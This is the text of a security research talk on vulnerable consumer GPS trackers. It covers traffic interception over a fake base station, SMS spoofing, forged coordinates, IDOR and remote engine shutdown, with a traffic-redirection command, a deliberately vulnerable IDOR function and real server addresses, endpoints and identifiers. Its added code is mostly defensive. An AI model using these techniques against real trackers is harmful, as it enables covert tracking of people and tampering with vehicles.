All your GPS Trackers belong to Us
Who we are
Pierre Barre, Lead Security Researcher, Mobile and Telecom Lab
Chaouki Kasmi, Lab Director, Mobile and Telecom Lab
Eiman Al Shehhi, Security Researcher, Mobile and Telecom Lab
The opinions and results presented in this article are the sole responsibility of the authors.
Tests and Validation Labs, xen1thLabs, DarkMatter Group
GPS Tracker Technology
Cheap
Using remote management without advertising it
Available everywhere
Compatible with iOS/Android
Presentation
Infrastructure
Devices
Blackbox analysis
Information gathering (FCC ID)
Network analysis (Wireless and wired)
Reverse Engineering (hard, firmware, clients)
OWASP - webapp
General Architecture
Points of interaction:
• Radio interface (GPS/mobile network)
• Remote servers
• Web application
• Mobile application
• Management protocols
[Architecture diagram: GPS Satellites, Mobile Network, Internet, tracked devices/items, tracking reports, Management Servers, Data Base, Web Servers]
Existing research
Web analysis – Trackmageddon (Multiple vulnerabilities in the online services of (GPS) location tracking devices)
Kang Wang, Shuhua Chen, Aimin Pan, Time and Position Spoofing with Open Source Projects
Fidus, Exploiting 10,000+ devices used by Britain’s most vulnerable
Defining attack surfaces
Security of GPS trackers is well-known
Objectives: finding new vulnerabilities/weaknesses, having fun, hacking the planet
Exploitation: detecting trackers (2G, 2.5G, 3G and IP network), tracking people, remotely shutting down car engines, GPS information, BTS and eNodeB information
Attack Surfaces:
Radio – passive (2G, GPRS)
Radio – active (2G, GPRS and GPS)
Network (Layer 3!) – remote management server and custom protocols
Hardware attack - tracker
Software attack - tracker
Software attack - iOS/Android clients
Web interface (management)
Analyzed trackers
Multiple GPS trackers bought online (Aliexpress)
Presentation of the devices
3 types of GPS / infrastructures
GPS infrastructures share the same technologies!
Chinese dominance of existing solutions
2 solutions
GSM (A5/1) interception
Setup of a custom BTS
1 paper in MISC (focused on methodology)
1 scientific paper (focused on privacy)
Passive Radio Attack
YateBTS with sgsntun interface
SIM cards (not USIM)
Live demo!
Registration (using IMEI or S/N and 123456)
Creation of account in advance
Configuration using SMS
First fail: the content of all SMS is sent to China (we will come back to this later)
Proprietary protocols over text messages
Passive Radio Attack
Setup is very cheap (BladeRF, SIM cards, Internet)
Very good results in a limited time
All trackers send coordinates to IPs in China
The traffic is not encrypted and is easily identifiable
Passwords sent in clear text, S/N used as a token
SMS configuration is generic and very dangerous
“Firewall” using a master phone number – bypassed by spoofing Caller-ID
Phone number of the tracker is supposed to be “secret” (security/privacy)
Passive Radio Attack – configuration using SMS
1. An SMS (“Status”) is sent to the tracker from 440025239 over 2G.
2. Sniffing the GPRS data from the tracker shows:
   1. an IP packet to 203.130.62.29:8841
   2. 690217122612463 = S/N of the GPS tracker
   3. +440025239 is the sender
   4. “Status” is the content of the SMS
Only specific commands sent from SMS?
1. An SMS (“jjjj[…]”) is sent to the tracker over 2G.
2. The tracker sends the content of the SMS to a remote server (203.130.62.29).
Passive Network Attack – RE of custom protocols
No authentication
\x79\x79\x00 I \xf2 [S/N-ASCII][BLOB-ASCII] \x01\x7e [BLOB-ASCII]
Traffic sent to 203.130.62.29:8841/tcp (geo-located in China)
Basic client allowing us to send forged coordinates
Where is Waldo?
Pinging 203.130.62.29 with 32 bytes of data:
Reply from 203.130.62.29: bytes=32 time=9ms TTL=58
Reply from 203.130.62.29: bytes=32 time=10ms TTL=58
10 ms and 6 hops? To China? Impossible.
203.130.62.29/24 is announced by Etisalat, the largest UAE provider, and hosted in Dubai.
Everything (configuration, tracking, information, phone numbers) is sent to the UAE.
Big trust given to the manufacturer. GDPR anyone?
Reconfiguration of the management server using SMS allows expats to set up an SMS forwarding service for no cost.
Passive Network Attack – RE of custom protocols
U-Blox module – connection to a TCP service on the 56447/tcp port:
cmd=full;[email protected];pwd=XXXXXX;lat=22.680193;lon=114.146846;alt=0.0;pacc=100.00
u-blox a-gps server (c) 1997-2009 u-blox AG
Content-Length: 2856
Content-Type: application/ubx
.b..0......
The client then regularly sends information to a second server (8011/tcp) indicating its position:
*HQ,17000XXXXX,V1,115112,A,2240.8116,N,11408.8108,E,000.0,000.00,100119,FFFFFFFF#
*HQ,17000XXXXX,NBR,094111,310,26,02,1,1000,10,23,100119,FFFFFFFF#
*HQ,17000XXXXX,LINK,115112,22,0,6,0,0,100119,FFFFFFFF#
*HQ,17000XXXXX,NBR,115117,310,26,02,1,1000,10,22,100119,FFFFFFFF#
Different commands can be detected according to the serial number (17000XXXXX).
2240.8116 corresponds to the latitude 22.408116 and the longitude 11.4088108.
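As an added example (not code from the talk; the authors wrote their own client in Perl), here is the defender's counterpart to that reverse engineering: a parser for the *HQ report lines shown above, of the kind an ISP-side detector would run to pick these frames out of a traffic capture and recover the reported positions. It assumes the V1 field order is the usual NMEA one (time, validity flag, latitude, N/S, longitude, E/W, speed, course, date, status mask), which the undocumented protocol is not guaranteed to follow; the sample stream is constructed around the captured lines, with the serial masked as on the slide, plus a southern/western fix and a no-fix (V) line to exercise the edge cases. Read as degrees and minutes, 2240.8116 N / 11408.8108 E come out as 22.680193 / 114.146847, the same values the tracker put in its u-blox A-GPS request above.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Constructed sample stream modelled on the captured lines. The serial is masked
# (17000XXXXX) exactly as on the slide; the S/W fix, the noise line and the 'V'
# (no valid fix) line are added here to exercise hemisphere and validity handling.
SAMPLE_STREAM = """\
*HQ,17000XXXXX,V1,115112,A,2240.8116,N,11408.8108,E,000.0,000.00,100119,FFFFFFFF#
*HQ,17000XXXXX,NBR,094111,310,26,02,1,1000,10,23,100119,FFFFFFFF#
*HQ,17000XXXXX,LINK,115112,22,0,6,0,0,100119,FFFFFFFF#
*HQ,17000XXXXX,V1,115212,A,2240.9000,S,11409.0000,W,012.5,090.00,100119,FFFFFFFF#
noise: not a tracker frame
*HQ,17000XXXXX,V1,115312,V,0000.0000,N,00000.0000,E,000.0,000.00,100119,FFFFFFFF#
"""

# A frame is '*HQ', the serial, a command keyword, command-specific fields, then '#'.
FRAME_RE = re.compile(r"^\*HQ,([^,]+),([A-Z0-9]+),(.*)#$")


@dataclass(frozen=True)
class Position:
    serial: str
    time_utc: str      # hhmmss as sent by the tracker
    date: str          # ddmmyy
    lat: float         # decimal degrees, south negative
    lon: float         # decimal degrees, west negative
    speed_knots: float
    course_deg: float


def ddmm_to_decimal(field: str, hemisphere: str) -> float:
    """Convert an NMEA-style (d)ddmm.mmmm field plus hemisphere letter to signed decimal degrees."""
    dot = field.find(".")
    if dot < 3:
        raise ValueError(f"malformed coordinate field {field!r}")
    degrees = int(field[: dot - 2])          # everything before the two minute digits
    minutes = float(field[dot - 2 :])        # mm.mmmm
    if not 0.0 <= minutes < 60.0:
        raise ValueError(f"minutes out of range in {field!r}")
    value = degrees + minutes / 60.0
    if hemisphere in ("S", "W"):
        value = -value
    elif hemisphere not in ("N", "E"):
        raise ValueError(f"unknown hemisphere {hemisphere!r}")
    return round(value, 6)


def parse_frame(line: str) -> Tuple[Optional[str], Optional[Position]]:
    """Return (command, Position). Non-frames give (None, None); non-V1 or invalid fixes give (cmd, None)."""
    m = FRAME_RE.match(line.strip())
    if not m:
        return None, None
    serial, cmd, rest = m.groups()
    if cmd != "V1":
        return cmd, None
    f = rest.split(",")
    # Assumed V1 layout (standard NMEA order): time, validity, lat, N/S, lon, E/W, speed, course, date, status
    if len(f) < 9 or f[1] != "A":
        return cmd, None
    try:
        pos = Position(serial, f[0], f[8],
                       ddmm_to_decimal(f[2], f[3]), ddmm_to_decimal(f[4], f[5]),
                       float(f[6]), float(f[7]))
    except ValueError:
        return cmd, None
    return cmd, pos


def summarise_stream(text: str) -> Tuple[Dict[str, int], List[Position]]:
    """Count command keywords in a stream and collect every valid position, in order."""
    counts: Dict[str, int] = {}
    positions: List[Position] = []
    for line in text.splitlines():
        cmd, pos = parse_frame(line)
        if cmd is None:
            continue
        counts[cmd] = counts.get(cmd, 0) + 1
        if pos is not None:
            positions.append(pos)
    return counts, positions


if __name__ == "__main__":
    counts, fixes = summarise_stream(SAMPLE_STREAM)
    print("commands seen:", counts)
    for p in fixes:
        print(f"{p.serial} {p.date} {p.time_utc}Z lat={p.lat:.6f} lon={p.lon:.6f} {p.speed_knots} kn")
```

Because the frames carry no authentication, a parser like this is all that is needed to build a per-serial position feed from a tap; the same property is what makes the forged-coordinate client on the next slide possible.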
Active Network Attack – RE of custom protocols
There is no authentication in the protocol
We wrote a client in Perl resulting in locations in North Korea:
An attacker able to guess a serial number can send false information to the GPS management infrastructure.
Hint: this is do-able
Active Radio Attack
GPS Spoofing – public for years
Detection of GPS trackers using SMS (custom keywords without “authentication”)
Custom spoofed SMS (“reg my_ip”)
Not always mandatory to spoof
New management server defined
Using `balance` to intercept and change the traffic over the Internet
balance -b ::ffff:my_ip 8841 203.130.62.29:8841
Data traffic modification on-the-fly (mitmproxy, bettercap, …)
Use a faraday cage
Don’t do this at home
Active Radio Attack
Voice
Using the device to listen (2G)
Call-back support (by SMS)
Microphone
Movement/noise detectors
Cameras
Additional wireless interfaces
Wireless client
Scanner
RF - attack surface
Network – attack surface
Multiple trackers – multiple remote management servers
3 GPS trackers, 3 different back-ends
Infrastructures based on a few OEM solutions
Chinese IPs but:
Located in China,
Located in Germany,
Located in UAE (open ports, banking websites, …),
Reverse Engineering of protocols: Done
Specific traffic: on the ISP side it is easy to detect, extract the coordinates and modify them on the fly
APIs
Live demo
Hardware Attack
GPS chips:
U-blox G7020
SIMCom SIM800
Support of GPS, GLONASS, QZSS, Galileo
Flash memory (4MB)
MediaTek SoC (ARM - MT6261DA)
No protection against physical attacks
UART port
Firmware dumping
Debug interface available
Analysis (ARM)
Hidden commands found
Software Attack
ARM dump
Loaded within IDA Pro
Nucleus RTOS
Data Line S8 Locator – hidden commands
Backdoors SMS codes
Different trackers, different OEMs, different commands, different network protocols
Not all of these SMS commands seem to be functional.
SMS parsing, Quick’n’Dirty
HTTP client and custom client
Parsing prone to errors
No firmware update features
Android/iOS Clients
Dynamic Analysis (android emulator)
Static Analysis (jadx)
Results
Authentication (login/password)
APIs access
(Lack of?) Authentication for APIs
Need an unrelated valid session
Communication over HTTP (no encryption)
http://m.999gps.net/OpenAPIV2.asmx with debug!
http://m.999gps.net/OpenAPIV2.asmx?WSDL (full description!)
Insecure Direct Object References
IDOR already found by the Trackmageddon team in January 2018!
Web Interface – attack surface
Web site
Live information (GPS, speed)
Replay
Geofence definition
OEM version (.NET) provided to a lot of providers of GPS products
Web Interface – attack surface – Geofence
Authentication based on last 7 integers of the S/N
Default pwd: 123456
Geofence:
Stop/start command with a remote control (!)
Auto-shutdown of the car (!)
Alerts (SMS, push on app)
Vulnerable to IDOR
Anyone can geofence your tracker
Blindly trust the (forged) GPS information sent to the server
Good idea, very bad implementation
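Slide 14 showed the management server accepting a North Korean position for a tracker last seen in Shenzhen, and this slide shows geofence rules (alerts, engine shutdown) acting on whatever position arrives. As an added example, not the vendor's code, here is the server-side plausibility check that would catch both: each report is compared with the last accepted fix, a jump that implies an impossible speed is rejected and is not used as the new reference, and geofence enter/exit events are raised only on accepted fixes. The 300 km/h ceiling, the 5 km fence and the four timestamps are constructed assumptions; the first fix reuses the Shenzhen coordinates from slide 13.

```python
import math
from dataclasses import dataclass
from typing import List, Optional, Tuple

EARTH_RADIUS_KM = 6371.0
MAX_PLAUSIBLE_KMH = 300.0   # assumed ceiling for a vehicle tracker; tune per fleet


@dataclass(frozen=True)
class Fix:
    serial: str
    ts: int        # seconds since epoch (constructed values below)
    lat: float
    lon: float


@dataclass(frozen=True)
class Verdict:
    ts: int
    accepted: bool
    implied_kmh: float          # speed implied by the jump from the last accepted fix
    fence_event: Optional[str]  # "enter", "exit" or None; only ever set on accepted fixes


def haversine_km(lat1: float, lon1: float, lat2: float, lon2: float) -> float:
    """Great-circle distance in km between two points given in decimal degrees."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi = p2 - p1
    dlmb = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlmb / 2) ** 2
    return 2 * EARTH_RADIUS_KM * math.asin(math.sqrt(a))


def implied_speed_kmh(prev: Fix, cur: Fix) -> float:
    """Speed the tracker would need to get from prev to cur in the elapsed time."""
    dt_h = (cur.ts - prev.ts) / 3600.0
    if dt_h <= 0:
        return float("inf")   # out-of-order or replayed timestamp: never plausible
    return haversine_km(prev.lat, prev.lon, cur.lat, cur.lon) / dt_h


def evaluate(fixes: List[Fix], fence_center: Tuple[float, float], fence_radius_km: float) -> List[Verdict]:
    """Accept a fix only if it is reachable from the last *accepted* fix; fence events only on accepted fixes."""
    verdicts: List[Verdict] = []
    last_ok: Optional[Fix] = None
    inside: Optional[bool] = None
    for fx in fixes:
        speed = 0.0 if last_ok is None else implied_speed_kmh(last_ok, fx)
        if speed > MAX_PLAUSIBLE_KMH:
            # A rejected fix does not become the reference: one forged jump must not
            # cause every later genuine report to be rejected as well.
            verdicts.append(Verdict(fx.ts, False, speed, None))
            continue
        last_ok = fx
        now_inside = haversine_km(fx.lat, fx.lon, fence_center[0], fence_center[1]) <= fence_radius_km
        event = None
        if inside is not None and now_inside != inside:
            event = "exit" if inside else "enter"
        inside = now_inside
        verdicts.append(Verdict(fx.ts, True, speed, event))
    return verdicts


# Constructed sequence: a genuine fix in Shenzhen (coordinates from slide 13), a forged
# report placing the same tracker in Pyongyang five minutes later, then genuine fixes again.
SAMPLE_FIXES = [
    Fix("17000XXXXX", 0,    22.680193, 114.146846),
    Fix("17000XXXXX", 300,  39.039200, 125.762500),   # forged: ~2100 km away in 5 minutes
    Fix("17000XXXXX", 900,  22.690000, 114.150000),   # about 1 km from the first fix
    Fix("17000XXXXX", 1800, 22.750000, 114.200000),   # genuinely leaves the 5 km fence
]
FENCE_CENTER = (22.680193, 114.146846)
FENCE_RADIUS_KM = 5.0


if __name__ == "__main__":
    for v in evaluate(SAMPLE_FIXES, FENCE_CENTER, FENCE_RADIUS_KM):
        print(v)
```

The check does not make the protocol authenticated; it only stops an isolated forged report from triggering alerts or a remote shutdown. An attacker who controls the serial can still walk a position out of the fence at plausible speeds, so the real fix remains authenticating the reports themselves.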
Web Interface – attack surface
Web interface full of vulnerabilities
IDOR everywhere (tracker ID: 82383)
Full history of GPS tracker data
APIs
Let’s dig
Full of vulnerabilities
Same as Android/iOS
Kudos to the Trackmageddon team (pwn of 100s of APIs)
Live demo
GDPR?
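The IDOR named on this slide and on slide 20 (any valid session can fetch the history of tracker 82383, or of any other id) in an added example that is not the vendor's code: the vulnerable lookup beside a version that resolves the object through the caller's ownership and logs denials, plus a small check that flags a session probing several foreign ids in a row, which is the server-side signal the Trackmageddon-style API sweeps would leave. The ownership table, the second tracker id, the user names and the history entries are constructed.

```python
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set, Tuple

# Constructed ownership table and history store. 82383 is the tracker id from the slide;
# the second id, the owners and the history rows are made up for the example.
OWNER_OF: Dict[int, str] = {82383: "alice", 82384: "bob"}
HISTORY: Dict[int, List[str]] = {
    82383: ["2019-01-10T11:51:12Z 22.680193,114.146846"],
    82384: ["2019-01-10T09:41:11Z 22.690000,114.150000"],
}


class Forbidden(Exception):
    pass


@dataclass
class Session:
    user_id: str


@dataclass
class AccessLog:
    """Denied (user, tracker_id) pairs: the raw material for spotting id enumeration."""
    denied: List[Tuple[str, int]] = field(default_factory=list)


def get_history_idor(session: Optional[Session], tracker_id: int) -> List[str]:
    """Vulnerable pattern: any logged-in session may read any tracker by id."""
    if session is None:
        raise Forbidden("login required")
    if tracker_id not in HISTORY:
        raise KeyError(tracker_id)
    return HISTORY[tracker_id]


def get_history_checked(session: Optional[Session], tracker_id: int, log: AccessLog) -> List[str]:
    """Hardened: the object is resolved through the caller's ownership, and a foreign or
    non-existent id gets the same error so ids cannot be told apart by probing."""
    if session is None:
        raise Forbidden("login required")
    if OWNER_OF.get(tracker_id) != session.user_id:
        log.denied.append((session.user_id, tracker_id))
        raise Forbidden("no such tracker")
    return HISTORY[tracker_id]


def probe(session: Session, tracker_id: int, log: AccessLog) -> Optional[List[str]]:
    """Attempt a checked read; None when denied (used by the demo loop below)."""
    try:
        return get_history_checked(session, tracker_id, log)
    except Forbidden:
        return None


def enumerating_users(log: AccessLog, threshold: int = 3) -> Set[str]:
    """Users denied on at least `threshold` distinct tracker ids: a simple enumeration signal."""
    per_user: Dict[str, Set[int]] = {}
    for user, tid in log.denied:
        per_user.setdefault(user, set()).add(tid)
    return {u for u, ids in per_user.items() if len(ids) >= threshold}


if __name__ == "__main__":
    alice = Session("alice")
    print("IDOR read of bob's tracker:", get_history_idor(alice, 82384))
    log = AccessLog()
    print("own tracker:", get_history_checked(alice, 82383, log))
    for tid in (82384, 82385, 82386):
        probe(alice, tid, log)
    print("users probing foreign ids:", enumerating_users(log))
```

The same ownership lookup belongs in every API method, including the SOAP OpenAPIV2 endpoints used by the mobile clients; fixing it in the web interface alone leaves the IDOR reachable through the other front end.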
Conclusion
Thanks!
Black box devices – implementations from big OEM vendors
Used everywhere (in industrial machines too)
Cell-IDs – can be used to map the critical mobile telecom infrastructure of a given country
Huge subject (including RE, network analysis, SDR, web) – a real CTF
Hope you had fun!
Still some work to do!
At xen1thLabs we are committed to uncovering new vulnerabilities that combat tomorrow’s threats today.
References
V. Stykas, M. Gruhn, Multiple vulnerabilities in the online services of (GPS) location tracking devices (Trackmageddon), [online] https://0x0.li/trackmageddon/
Kang Wang, Shuhua Chen, Aimin Pan, Time and Position Spoofing with Open Source Projects, BlackHat Europe 2015, Amsterdam, NL, [online] https://www.blackhat.com/docs/eu-15/materials/eu-15-Kang-Is-Your-Timespace-Safe-Time-And-Position-Spoofing-Opensourcely-wp.pdf
gps-sdr-sim, [online] https://github.com/osqzss/gps-sdr-sim
302 GPS TRACKER, user manual, [online] https://fccid.io/2AA64-302/User-Manual/User-Manual-3470390
YateBTS GSM basestation - Open Source Software, [online] https://yatebts.com/open_source/#svn
jadx, [online] https://github.com/skylot/jadx
S. Ragan, GPS tracking vulnerabilities leave millions of products at risk, CSO, 2 January 2018, [online] https://www.csoonline.com/article/3245312/gps-tracking-vulnerabilities-leave-millions-of-products-at-risk.html
Norwegian Consumer Council (Forbrukerrådet), security issues in kids’/elderly tracking watches (#WatchOut report), October 2017, [online] https://fil.forbrukerradet.no/wp-content/uploads/2017/10/watchout-rapport-october-2017.pdf
Pen Test Partners, Tracking and snooping on a million kids, [online] https://www.pentestpartners.com/security-blog/tracking-and-snooping-on-a-million-kids/